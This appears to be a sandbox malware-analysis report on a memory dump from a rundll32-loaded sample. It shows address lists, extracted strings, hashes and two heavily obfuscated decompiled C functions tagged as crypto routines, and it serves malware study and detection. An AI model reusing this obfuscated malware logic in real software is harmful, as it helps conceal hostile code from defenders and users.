0x001b87cb
0x001b87d3
0x001b87d8
0x001b87e0
0x001b87e8
0x001b87f0
0x001b87f8
0x001b8800
0x001b8808
0x001b8813
0x001b881b
0x001b8826
0x001b8834
0x001b8839
0x001b883d
0x001b8842
0x001b884a
0x001b8852
0x001b885a
0x001b8864
0x001b8868
0x00000000
0x001b8870
0x001b8882
0x001b8a11
0x001b8a33
0x001b8a38
0x001b8a3a
0x001b8a3f
0x001b8a44
0x00000000
0x001b8a44
0x001b888e
0x001b89ea
0x001b89f0
0x00000000
0x001b89f0
0x001b889a
0x001b89b2
0x001b89b3
0x001b89b9
0x001b89c9
0x001b89cb
0x001b89ce
0x001b89d5
0x00000000
0x001b89d5
0x001b88a2
0x001b8909
0x001b890e
0x001b8911
0x001b8913
0x001b8954
0x001b8969
0x001b8969
0x001b896b
0x001b899b
0x001b896d
0x001b8986
0x001b8989
0x001b898e
0x001b8991
0x001b8991
0x00000000
0x001b896b
0x001b8915
0x001b8917
0x001b8917
0x001b891b
0x00000000
0x00000000
0x001b891d
0x001b8921
0x001b8932
0x001b8937
0x001b893a
0x001b893c
0x001b894a
0x001b894b
0x001b8964
0x001b8964
0x00000000
0x001b8964
0x001b893e
0x001b893e
0x001b8940
0x001b8942
0x001b895d
0x00000000
0x001b895d
0x001b8944
0x001b8917
0x001b891b
0x00000000
0x00000000
0x00000000
0x001b891b
0x001b8917
0x001b88aa
0x001b8ad2
0x001b8ada
0x001b8add
0x001b8ae6
0x001b8ae6
0x001b88b6
0x001b8aad
0x001b8aad
0x001b8ab3
0x00000000
0x00000000
0x00000000
0x001b8ab9
0x001b88bc
0x001b88bc
0x001b8a8f
0x001b8a94
0x001b8a96
0x001b8a99
0x001b8a9c
0x001b8aa8
0x00000000
0x001b8aa8
0x001b8a9e
0x00000000

Strings

{c, xrefs: 001B872C
<|, xrefs: 001B8790
Wm!, xrefs: 001B8834
G, xrefs: 001B8464
ow, xrefs: 001B87C3
ND, xrefs: 001B884A
|B, xrefs: 001B8547
*F, xrefs: 001B859D
', xrefs: 001B8673
*G, xrefs: 001B8492
Wm!, xrefs: 001B8964
Ns, xrefs: 001B83B2
]W, xrefs: 001B8621

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *F$*G$<|$ND$Ns$]W$ow${c$|B$'$G$Wm!$Wm!
API String ID: 0-1717016009
Opcode ID: 7917cece854f83b883252458fec4ca12e80c972050016aba2478cd79ee62f4a9
Instruction ID: 03f39bc475e18d429d8e3686438920e76647f41afd5cece68304d60a17aae3bf
Opcode Fuzzy Hash: 7917cece854f83b883252458fec4ca12e80c972050016aba2478cd79ee62f4a9
Instruction Fuzzy Hash: 43122471509381DFE3A8CF25C98969BBBE1FBC4754F10891DE2DA862A0D7B48949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001AAF28, Relevance: 15.4, Strings: 12, Instructions: 407
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001AAF28(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t444;
				signed int _t448;
				void* _t457;
				signed int _t476;
				intOrPtr _t477;
				intOrPtr* _t480;
				void* _t482;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				signed int _t542;
				signed int _t543;
				intOrPtr _t544;
				void* _t545;
				void* _t548;
				void* _t551;
				intOrPtr* _t554;
				signed int* _t555;
				signed int* _t556;

				_t480 = __ecx;
				_t555 =  &_v316;
				_v144 = __edx;
				_v148 = __ecx;
				_v140 = 0x6a870;
				_v136 = 0;
				_v132 = 0;
				_v192 = 0x43a2;
				_v192 = _v192 + 0x130f;
				_v192 = _v192 ^ 0x00000862;
				_v228 = 0x6a30;
				_v228 = _v228 * 0x7c;
				_t545 = 0x39d92d58;
				_v228 = _v228 << 9;
				_v228 = _v228 ^ 0x66dea5d7;
				_v308 = 0xc191;
				_v308 = _v308 + 0xab60;
				_v308 = _v308 ^ 0xd5684b93;
				_t533 = 0x79;
				_v308 = _v308 / _t533;
				_v308 = _v308 ^ 0x01c3b293;
				_v168 = 0x473;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x00007ae9;
				_v208 = 0x2774;
				_v208 = _v208 ^ 0x1e9334f1;
				_v208 = _v208 ^ 0x1e932766;
				_v276 = 0x7682;
				_v276 = _v276 + 0xee95;
				_t534 = 0x74;
				_v276 = _v276 / _t534;
				_t535 = 0x17;
				_v276 = _v276 * 0x72;
				_v276 = _v276 ^ 0x00014fdc;
				_v216 = 0xba57;
				_v216 = _v216 ^ 0x53d3d51f;
				_v216 = _v216 ^ 0x53d320fa;
				_v284 = 0xb8fa;
				_v284 = _v284 / _t535;
				_v284 = _v284 + 0xffff24c4;
				_v284 = _v284 << 0x10;
				_v284 = _v284 ^ 0x2cce038a;
				_v268 = 0xf7b7;
				_t536 = 0x11;
				_v268 = _v268 * 0x32;
				_v268 = _v268 * 0x2b;
				_v268 = _v268 >> 3;
				_v268 = _v268 ^ 0x010416fb;
				_v300 = 0xb3f3;
				_v300 = _v300 << 0xe;
				_v300 = _v300 ^ 0x154d9390;
				_v300 = _v300 / _t536;
				_v300 = _v300 ^ 0x0364be3c;
				_v172 = 0x2c2b;
				_v172 = _v172 + 0xffffec7c;
				_v172 = _v172 ^ 0x00001ae8;
				_v224 = 0x911c;
				_v224 = _v224 << 0x10;
				_t537 = 0x71;
				_v224 = _v224 * 0x60;
				_v224 = _v224 ^ 0x6a80737f;
				_v184 = 0xdd2a;
				_v184 = _v184 >> 0xc;
				_v184 = _v184 ^ 0x000035d1;
				_v292 = 0xdbbc;
				_v292 = _v292 << 0xa;
				_v292 = _v292 / _t537;
				_v292 = _v292 + 0x1f68;
				_v292 = _v292 ^ 0x0007b889;
				_v232 = 0xfe49;
				_t538 = 0x27;
				_v232 = _v232 / _t538;
				_v232 = _v232 | 0x70a43f1f;
				_v232 = _v232 ^ 0x70a403ca;
				_v164 = 0xb7fd;
				_t476 = 0x1c;
				_v164 = _v164 / _t476;
				_v164 = _v164 ^ 0x00007732;
				_v316 = 0x3b81;
				_v316 = _v316 + 0xffffa23f;
				_v316 = _v316 ^ 0x6ce925b7;
				_v316 = _v316 << 4;
				_v316 = _v316 ^ 0x316ff323;
				_v248 = 0x9899;
				_v248 = _v248 + 0xfffffaa2;
				_v248 = _v248 >> 0xf;
				_v248 = _v248 ^ 0x00000670;
				_v176 = 0xc545;
				_t539 = 0x5a;
				_v176 = _v176 / _t539;
				_v176 = _v176 ^ 0x0000518c;
				_v256 = 0x5fe2;
				_v256 = _v256 | 0x0277acff;
				_v256 = _v256 ^ 0x07e6deb5;
				_v256 = _v256 ^ 0x05914433;
				_v240 = 0xd0b5;
				_v240 = _v240 ^ 0x5f0c7be6;
				_v240 = _v240 ^ 0xa82696c1;
				_v240 = _v240 ^ 0xf72a4da1;
				_v212 = 0xb3e0;
				_v212 = _v212 << 0x10;
				_v212 = _v212 ^ 0xb3e03660;
				_v312 = 0xefd7;
				_v312 = _v312 >> 0xb;
				_v312 = _v312 * 0x47;
				_v312 = _v312 | 0xe4800c53;
				_v312 = _v312 ^ 0xe4803130;
				_v244 = 0xec65;
				_v244 = _v244 + 0xffff9556;
				_v244 = _v244 | 0x698b2e6b;
				_v244 = _v244 ^ 0x698bc8a6;
				_v156 = 0x127c;
				_v156 = _v156 | 0x6c9b908e;
				_v156 = _v156 ^ 0x6c9bb95e;
				_v252 = 0xa39f;
				_v252 = _v252 ^ 0x10ea91c2;
				_v252 = _v252 + 0xffff0c69;
				_v252 = _v252 ^ 0x10e95188;
				_v296 = 0xcf1a;
				_t540 = 0x72;
				_v296 = _v296 / _t540;
				_t541 = 0x65;
				_v296 = _v296 / _t541;
				_v296 = _v296 ^ 0x49cec570;
				_v296 = _v296 ^ 0x49cefc9f;
				_v304 = 0xfa92;
				_v304 = _v304 ^ 0x91685bd9;
				_t542 = 0x5b;
				_v304 = _v304 / _t542;
				_v304 = _v304 >> 0xe;
				_v304 = _v304 ^ 0x0000734c;
				_v236 = 0x2319;
				_v236 = _v236 | 0x585205ff;
				_v236 = _v236 + 0x46c8;
				_v236 = _v236 ^ 0x585256ad;
				_v160 = 0xec38;
				_v160 = _v160 + 0xad8f;
				_v160 = _v160 ^ 0x0001bf45;
				_v200 = 0x7768;
				_v200 = _v200 | 0x7e4e67ed;
				_v200 = _v200 ^ 0x7e4e49cf;
				_v196 = 0x7f9c;
				_v196 = _v196 ^ 0x691be3cb;
				_v196 = _v196 ^ 0x691ba5a2;
				_v204 = 0x675;
				_v204 = _v204 | 0x9417c745;
				_v204 = _v204 ^ 0x9417a6f3;
				_v260 = 0x8fb0;
				_v260 = _v260 + 0xe239;
				_v260 = _v260 + 0xffff6c48;
				_v260 = _v260 ^ 0x0000cece;
				_v280 = 0x8e81;
				_v280 = _v280 + 0xffffbb5e;
				_v280 = _v280 + 0x1caa;
				_t543 = 0x18;
				_v280 = _v280 / _t543;
				_v280 = _v280 ^ 0x00002f18;
				_v288 = 0x5b56;
				_v288 = _v288 / _t476;
				_v288 = _v288 * 0x1b;
				_v288 = _v288 + 0xffff0a91;
				_v288 = _v288 ^ 0xffff6cbe;
				_v220 = 0x3904;
				_v220 = _v220 | 0x31b4c7be;
				_v220 = _v220 + 0xffffbc7e;
				_v220 = _v220 ^ 0x31b48f10;
				_v188 = 0x282d;
				_v188 = _v188 + 0xde16;
				_v188 = _v188 ^ 0x00013128;
				_v180 = 0x2ff0;
				_v180 = _v180 | 0xba1bde28;
				_v180 = _v180 ^ 0xba1ba646;
				_v264 = 0x9b10;
				_v264 = _v264 | 0x1221c802;
				_v264 = _v264 + 0xffff72da;
				_v264 = _v264 * 0x6a;
				_v264 = _v264 ^ 0x81ca5a0e;
				_v272 = 0x50a4;
				_v272 = _v272 >> 0x10;
				_v272 = _v272 | 0xf9b433b3;
				_v272 = _v272 ^ 0xd076b632;
				_v272 = _v272 ^ 0x29c2e299;
				_t554 = _a4;
				_t544 = _v144;
				_t477 = _v144;
				while(_t545 != 0xb384dcd) {
					if(_t545 == 0x1d518447) {
						_push(0x1001f0e0);
						_push(_v260);
						E001A8231(_t544, __eflags, _v144, _v288, E001A27F4(_v196, _v204), _v220, _t477 - _t544, _v188);
						E001AED35(_v180, _t459, _v264, _v272);
						return 1;
					}
					if(_t545 == 0x275acb0b) {
						E001A5C9F(_v160,  *_t480,  *((intOrPtr*)(_t480 + 4)), _t544, _v200);
						_t480 = _v148;
						_t555 =  &(_t555[3]);
						_t545 = 0x1d518447;
						_t544 = _t544 +  *((intOrPtr*)(_t480 + 4));
						continue;
					}
					if(_t545 == 0x2bae1097) {
						_push(_t480);
						_push(_t480);
						_t544 = E001B922B(_a4);
						_t555 =  &(_t555[3]);
						 *_t554 = _t544;
						__eflags = _t544;
						if(_t544 == 0) {
							L15:
							__eflags = 0;
							return 0;
						}
						_t545 = 0xb384dcd;
						_t477 = _a4 + _t544;
						L8:
						_t480 = _v148;
						continue;
					}
					if(_t545 == 0x38be0af1) {
						_t545 = 0x2bae1097;
						_a4 =  *((intOrPtr*)(_t480 + 4)) + 0x1000;
						continue;
					}
					if(_t545 != 0x39d92d58) {
						L14:
						__eflags = _t545 - 0x2366d38d;
						if(_t545 != 0x2366d38d) {
							continue;
						}
						goto L15;
					}
					_v152 = E001B0614();
					_t545 = 0x38be0af1;
					goto L8;
				}
				_t444 = E001AD703(_v216,  &_v152, _v284);
				_pop(_t482);
				_push( &_v152);
				_t548 = (_t444 & 0x0000000f) + 4;
				E001A8004(_v300, _v172, _v224, _t548, _t482,  &_v64);
				 *((char*)(_t555 + _t548 + 0x128)) = 0;
				_t448 = E001AD703(_v184,  &_v152, _v292);
				_t556 =  &(_t555[7]);
				_t551 = (_t448 & 0x0000000f) + 4;
				_push( &_v152);
				E001A8004(_v164, _v316, _v248, _t551, _v184,  &_v128);
				_push(0x1001f000);
				_push(_v240);
				 *((char*)(_t556 + _t551 + 0xec)) = 0;
				_t457 = E001A255B(E001A27F4(_v176, _v256), _v212, _t477 - _t544,  &_v64,  &_v128, _v312, _v244, _v156, _v252, _v144);
				_t555 =  &(_t556[0x11]);
				_t544 = _t544 + _t457;
				__eflags = _t544;
				E001AED35(_v296, _t452, _v304, _v236);
				_t480 = _v148;
				_t545 = 0x275acb0b;
				goto L14;
			}

0x001aaf28
0x001aaf28
0x001aaf32
0x001aaf39
0x001aaf40
0x001aaf4d
0x001aaf54
0x001aaf5b
0x001aaf66
0x001aaf71
0x001aaf7c
0x001aaf89
0x001aaf8d
0x001aaf92
0x001aaf97
0x001aaf9f
0x001aafa7
0x001aafaf
0x001aafbf
0x001aafc4
0x001aafca
0x001aafd2
0x001aafdd
0x001aafe5
0x001aaff0
0x001aaffb
0x001ab006
0x001ab011
0x001ab019
0x001ab025
0x001ab02a
0x001ab035
0x001ab038
0x001ab03c
0x001ab044
0x001ab04c
0x001ab054
0x001ab05c
0x001ab06c
0x001ab070
0x001ab078
0x001ab07d
0x001ab085
0x001ab092
0x001ab093
0x001ab09c
0x001ab0a0
0x001ab0a5
0x001ab0ad
0x001ab0b5
0x001ab0ba
0x001ab0c8
0x001ab0cc
0x001ab0d4
0x001ab0df
0x001ab0ea
0x001ab0f5
0x001ab0fd
0x001ab10b
0x001ab10e
0x001ab112
0x001ab11a
0x001ab125
0x001ab12d
0x001ab138
0x001ab140
0x001ab14d
0x001ab151
0x001ab159
0x001ab161
0x001ab16d
0x001ab172
0x001ab178
0x001ab180
0x001ab188
0x001ab19a
0x001ab19f
0x001ab1a8
0x001ab1b3
0x001ab1bb
0x001ab1c3
0x001ab1cb
0x001ab1d0
0x001ab1d8
0x001ab1e0
0x001ab1e8
0x001ab1ed
0x001ab1f5
0x001ab207
0x001ab20a
0x001ab211
0x001ab21c
0x001ab224
0x001ab22c
0x001ab234
0x001ab23c
0x001ab244
0x001ab24c
0x001ab254
0x001ab25c
0x001ab264
0x001ab269
0x001ab271
0x001ab279
0x001ab283
0x001ab287
0x001ab28f
0x001ab297
0x001ab29f
0x001ab2a7
0x001ab2af
0x001ab2b7
0x001ab2c2
0x001ab2cd
0x001ab2d8
0x001ab2e0
0x001ab2e8
0x001ab2f0
0x001ab2fa
0x001ab308
0x001ab30d
0x001ab317
0x001ab31c
0x001ab320
0x001ab328
0x001ab330
0x001ab338
0x001ab346
0x001ab34b
0x001ab34f
0x001ab354
0x001ab35c
0x001ab364
0x001ab36c
0x001ab374
0x001ab37c
0x001ab387
0x001ab392
0x001ab39d
0x001ab3a8
0x001ab3b3
0x001ab3be
0x001ab3c9
0x001ab3d4
0x001ab3df
0x001ab3ea
0x001ab3f5
0x001ab400
0x001ab408
0x001ab410
0x001ab418
0x001ab420
0x001ab428
0x001ab430
0x001ab43e
0x001ab443
0x001ab447
0x001ab44f
0x001ab45d
0x001ab466
0x001ab46a
0x001ab472
0x001ab47a
0x001ab482
0x001ab48a
0x001ab492
0x001ab49a
0x001ab4a5
0x001ab4b0
0x001ab4bb
0x001ab4c6
0x001ab4d1
0x001ab4dc
0x001ab4e4
0x001ab4ec
0x001ab4f9
0x001ab4fd
0x001ab505
0x001ab50d
0x001ab512
0x001ab51a
0x001ab522
0x001ab52a
0x001ab531
0x001ab538
0x001ab53f
0x001ab551
0x001ab75e
0x001ab763
0x001ab79f
0x001ab7b5
0x00000000
0x001ab7bf
0x001ab55d
0x001ab603
0x001ab608
0x001ab60f
0x001ab612
0x001ab617
0x00000000
0x001ab617
0x001ab569
0x001ab5c9
0x001ab5ca
0x001ab5d3
0x001ab5d5
0x001ab5d8
0x001ab5db
0x001ab5dd
0x001ab751
0x001ab751
0x00000000
0x001ab751
0x001ab5e6
0x001ab5eb
0x001ab59b
0x001ab59b
0x00000000
0x001ab59b
0x001ab571
0x001ab5a7
0x001ab5b1
0x00000000
0x001ab5b1
0x001ab579
0x001ab745
0x001ab745
0x001ab74b
0x00000000
0x00000000
0x00000000
0x001ab74b
0x001ab58f
0x001ab596
0x00000000
0x001ab596
0x001ab62e
0x001ab633
0x001ab63d
0x001ab64a
0x001ab661
0x001ab678
0x001ab680
0x001ab685
0x001ab694
0x001ab697
0x001ab6b5
0x001ab6ba
0x001ab6bf
0x001ab6ce
0x001ab71a
0x001ab71f
0x001ab724
0x001ab724
0x001ab732
0x001ab739
0x001ab740
0x00000000

Strings

t', xrefs: 001AAFF0
V[, xrefs: 001AB44F
Ls, xrefs: 001AB354
0j, xrefs: 001AAF7C
gN~, xrefs: 001AB3A8
z, xrefs: 001AAFE5
9, xrefs: 001AB408
_, xrefs: 001AB21C
8, xrefs: 001AB37C
+,, xrefs: 001AB0D4
e, xrefs: 001AB297
-(, xrefs: 001AB49A

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +,$-($0j$8$9$Ls$V[$e$t'$_$gN~$z
API String ID: 0-4288992561
Opcode ID: df5f00ac74a4e8b611f6c1653062e317230912e1236957e8d77b782226c76c54
Instruction ID: e82d98623a351bbbfb5f38791685ec8d6b8905ec933bd4082be2dc66fd810f76
Opcode Fuzzy Hash: df5f00ac74a4e8b611f6c1653062e317230912e1236957e8d77b782226c76c54
Instruction Fuzzy Hash: 772222715093819FE3A8CF25C48AA8BFBE1BBC5318F10891DE5D996260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001BB59B, Relevance: 15.3, Strings: 12, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001BB59B() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				void* _t309;
				void* _t312;
				void* _t313;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t367;
				signed int* _t371;

				_t371 =  &_v1156;
				_v1092 = 0xf690;
				_v1092 = _v1092 | 0xf7934fb0;
				_v1092 = _v1092 * 0x14;
				_t367 = 0x10587e01;
				_v1092 = _v1092 ^ 0x578fc7fe;
				_v1152 = 0x5ef3;
				_v1152 = _v1152 >> 2;
				_v1152 = _v1152 << 3;
				_v1152 = _v1152 + 0xffffc002;
				_v1152 = _v1152 ^ 0x000040ac;
				_v1044 = 0xa960;
				_v1044 = _v1044 ^ 0xe380f8d6;
				_v1044 = _v1044 ^ 0xe38000ac;
				_v1100 = 0xddeb;
				_v1100 = _v1100 | 0xe721a5ce;
				_v1100 = _v1100 + 0x5324;
				_v1100 = _v1100 ^ 0xe7226746;
				_v1140 = 0x148f;
				_v1140 = _v1140 + 0xffff64ce;
				_v1140 = _v1140 + 0x447f;
				_v1140 = _v1140 << 0xe;
				_v1140 = _v1140 ^ 0xef774fb2;
				_v1060 = 0x55a8;
				_v1060 = _v1060 << 5;
				_v1060 = _v1060 ^ 0x000a886e;
				_v1096 = 0x19da;
				_t320 = 0x6c;
				_v1096 = _v1096 / _t320;
				_v1096 = _v1096 | 0x4d0650db;
				_v1096 = _v1096 ^ 0x4d064557;
				_v1132 = 0x9934;
				_v1132 = _v1132 ^ 0x196601f3;
				_v1132 = _v1132 + 0x3c10;
				_v1132 = _v1132 ^ 0xae304ad8;
				_v1132 = _v1132 ^ 0xb756db0f;
				_v1064 = 0xd974;
				_t321 = 0x3d;
				_v1064 = _v1064 / _t321;
				_v1064 = _v1064 ^ 0x00007e54;
				_v1124 = 0xd3c8;
				_v1124 = _v1124 + 0xffff267a;
				_t322 = 0x56;
				_v1124 = _v1124 * 0x75;
				_v1124 = _v1124 + 0x565b;
				_v1124 = _v1124 ^ 0xfffdaef9;
				_v1088 = 0xe85f;
				_v1088 = _v1088 >> 1;
				_v1088 = _v1088 / _t322;
				_v1088 = _v1088 ^ 0x00001212;
				_v1052 = 0xe21e;
				_v1052 = _v1052 * 0x7a;
				_v1052 = _v1052 ^ 0x006bbadd;
				_v1120 = 0x9501;
				_v1120 = _v1120 + 0xae53;
				_v1120 = _v1120 << 0xf;
				_v1120 = _v1120 + 0xffffb9c9;
				_v1120 = _v1120 ^ 0xa1a9de43;
				_v1072 = 0x5dbc;
				_v1072 = _v1072 >> 0xa;
				_v1072 = _v1072 ^ 0x68683a45;
				_v1072 = _v1072 ^ 0x68687f3b;
				_v1104 = 0xc56b;
				_t323 = 0x4e;
				_v1104 = _v1104 / _t323;
				_v1104 = _v1104 | 0x81a244d4;
				_v1104 = _v1104 ^ 0x81a20643;
				_v1084 = 0xc6fe;
				_v1084 = _v1084 + 0x6c9a;
				_t324 = 0x59;
				_v1084 = _v1084 * 0x59;
				_v1084 = _v1084 ^ 0x006aa8a4;
				_v1144 = 0xbd98;
				_v1144 = _v1144 >> 4;
				_v1144 = _v1144 ^ 0x6fb2eadb;
				_v1144 = _v1144 + 0xffff8c5a;
				_v1144 = _v1144 ^ 0x6fb24f03;
				_v1148 = 0xe45d;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 / _t324;
				_v1148 = _v1148 + 0xffffb3bf;
				_v1148 = _v1148 ^ 0xffffc7fe;
				_v1048 = 0xc28e;
				_t325 = 0x6e;
				_v1048 = _v1048 / _t325;
				_v1048 = _v1048 ^ 0x00003855;
				_v1156 = 0x3cbb;
				_v1156 = _v1156 >> 0xd;
				_v1156 = _v1156 + 0xffffb38b;
				_t326 = 0x37;
				_v1156 = _v1156 * 0x54;
				_v1156 = _v1156 ^ 0xffe6845f;
				_v1068 = 0x7ec2;
				_v1068 = _v1068 * 0x71;
				_v1068 = _v1068 ^ 0x0037ed4e;
				_v1136 = 0xdbee;
				_v1136 = _v1136 | 0x505aaea7;
				_v1136 = _v1136 ^ 0x77b7dc81;
				_v1136 = _v1136 / _t326;
				_v1136 = _v1136 ^ 0x00b99836;
				_v1128 = 0x5a0a;
				_v1128 = _v1128 | 0x4ea2970c;
				_v1128 = _v1128 ^ 0x328e90e9;
				_v1128 = _v1128 + 0x6b4d;
				_v1128 = _v1128 ^ 0x7c2cf483;
				_v1076 = 0x4603;
				_v1076 = _v1076 + 0xf718;
				_v1076 = _v1076 + 0x78d6;
				_v1076 = _v1076 ^ 0x0001cbcf;
				_v1112 = 0x18b3;
				_v1112 = _v1112 << 7;
				_t327 = 0x46;
				_v1112 = _v1112 / _t327;
				_v1112 = _v1112 ^ 0x0000562e;
				_v1056 = 0x27a8;
				_t328 = 0x53;
				_v1056 = _v1056 / _t328;
				_v1056 = _v1056 ^ 0x000057f3;
				_v1108 = 0x1b22;
				_v1108 = _v1108 ^ 0x7ff4b565;
				_v1108 = _v1108 | 0x242e14ec;
				_v1108 = _v1108 ^ 0x7ffeed23;
				_v1116 = 0xa1af;
				_v1116 = _v1116 * 0xc;
				_v1116 = _v1116 >> 2;
				_v1116 = _v1116 + 0x9ff3;
				_v1116 = _v1116 ^ 0x0002cb53;
				_v1080 = 0x7050;
				_v1080 = _v1080 + 0xffffabd1;
				_v1080 = _v1080 + 0xffff67e0;
				_v1080 = _v1080 ^ 0xffff9b11;
				E001B686E(_t328);
				do {
					while(_t367 != 0x102a21de) {
						if(_t367 == 0x10587e01) {
							_t367 = 0x102a21de;
							continue;
						}
						if(_t367 == 0x24244a0a) {
							_push(_v1104);
							_push(_v1072);
							_t313 = E001A5EBA(_v1120, 0x1001f780, __eflags);
							E001AE32E(_t313, __eflags, _v1048, _v1156,  *0x10020724, _v1068, 0x104,  &_v1040, _v1136,  *0x10020724 + 0x238, E001B0614(), _v1128);
							_t268 =  &_v1112; // 0x7e54
							_t312 = E001AED35(_v1076, _t313,  *_t268, _v1056);
							_t371 =  &(_t371[0xe]);
							_t367 = 0x252af45e;
							continue;
						}
						_t377 = _t367 - 0x252af45e;
						if(_t367 != 0x252af45e) {
							goto L10;
						}
						return E001B473C( &_v520, _v1108, _t377, _v1116, _v1080,  &_v1040);
					}
					_push(_v1140);
					_push(_v1100);
					_t309 = E001A5EBA(_v1044, 0x1001f800, __eflags);
					__eflags =  *0x10020724 + 0x238;
					E001AEC82( *0x10020724 + 0x238, _t309, _v1060, _v1096, _v1132, _v1064,  *0x10020724 + 0x238,  &_v520);
					_t312 = E001AED35(_v1124, _t309, _v1088, _v1052);
					_t371 =  &(_t371[0xb]);
					_t367 = 0x24244a0a;
					L10:
					__eflags = _t367 - 0x2cb37c8b;
				} while (__eflags != 0);
				return _t312;
			}

0x001bb59b
0x001bb5a1
0x001bb5ab
0x001bb5bc
0x001bb5c0
0x001bb5c5
0x001bb5cd
0x001bb5d5
0x001bb5da
0x001bb5df
0x001bb5e7
0x001bb5ef
0x001bb5fa
0x001bb605
0x001bb610
0x001bb618
0x001bb620
0x001bb628
0x001bb630
0x001bb638
0x001bb640
0x001bb648
0x001bb64d
0x001bb655
0x001bb65d
0x001bb662
0x001bb66a
0x001bb678
0x001bb67d
0x001bb683
0x001bb68b
0x001bb693
0x001bb69b
0x001bb6a3
0x001bb6ab
0x001bb6b3
0x001bb6bb
0x001bb6c7
0x001bb6cc
0x001bb6d2
0x001bb6da
0x001bb6e2
0x001bb6ef
0x001bb6f0
0x001bb6f4
0x001bb6fc
0x001bb704
0x001bb70c
0x001bb716
0x001bb71a
0x001bb722
0x001bb72f
0x001bb733
0x001bb73b
0x001bb743
0x001bb74b
0x001bb750
0x001bb758
0x001bb760
0x001bb768
0x001bb76d
0x001bb775
0x001bb77d
0x001bb78d
0x001bb792
0x001bb798
0x001bb7a0
0x001bb7a8
0x001bb7b0
0x001bb7bd
0x001bb7c0
0x001bb7c4
0x001bb7cc
0x001bb7d4
0x001bb7d9
0x001bb7e1
0x001bb7e9
0x001bb7f1
0x001bb7f9
0x001bb806
0x001bb80a
0x001bb812
0x001bb81a
0x001bb82c
0x001bb831
0x001bb83a
0x001bb845
0x001bb84d
0x001bb852
0x001bb85f
0x001bb862
0x001bb866
0x001bb86e
0x001bb87b
0x001bb87f
0x001bb887
0x001bb88f
0x001bb897
0x001bb8a7
0x001bb8ab
0x001bb8b3
0x001bb8bb
0x001bb8c3
0x001bb8cb
0x001bb8d3
0x001bb8db
0x001bb8e3
0x001bb8eb
0x001bb8f3
0x001bb8fb
0x001bb903
0x001bb90c
0x001bb911
0x001bb917
0x001bb91f
0x001bb92b
0x001bb92e
0x001bb932
0x001bb93a
0x001bb942
0x001bb94a
0x001bb952
0x001bb95a
0x001bb967
0x001bb96b
0x001bb970
0x001bb978
0x001bb980
0x001bb988
0x001bb990
0x001bb998
0x001bb9a8
0x001bb9bc
0x001bb9bc
0x001bb9ca
0x001bba98
0x00000000
0x001bba98
0x001bb9d2
0x001bba0a
0x001bba13
0x001bba1b
0x001bba70
0x001bba7e
0x001bba89
0x001bba8e
0x001bba91
0x00000000
0x001bba91
0x001bb9d4
0x001bb9d6
0x00000000
0x00000000
0x00000000
0x001bb9fc
0x001bba9f
0x001bbaa8
0x001bbab3
0x001bbac7
0x001bbae9
0x001bbaff
0x001bbb04
0x001bbb07
0x001bbb09
0x001bbb09
0x001bbb09
0x00000000

Strings

.V, xrefs: 001BB917
ar-KW, xrefs: 001BBA33, 001BBA49, 001BBAB8, 001BBACE, 001BBAE2
_, xrefs: 001BB704
E:hh, xrefs: 001BB76D
J$$, xrefs: 001BB9B2
U8, xrefs: 001BB83A
Mk, xrefs: 001BB8CB
Fg", xrefs: 001BB628
Pp, xrefs: 001BB980
], xrefs: 001BB7F1
N7, xrefs: 001BB87F
T~N7, xrefs: 001BBA7E

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

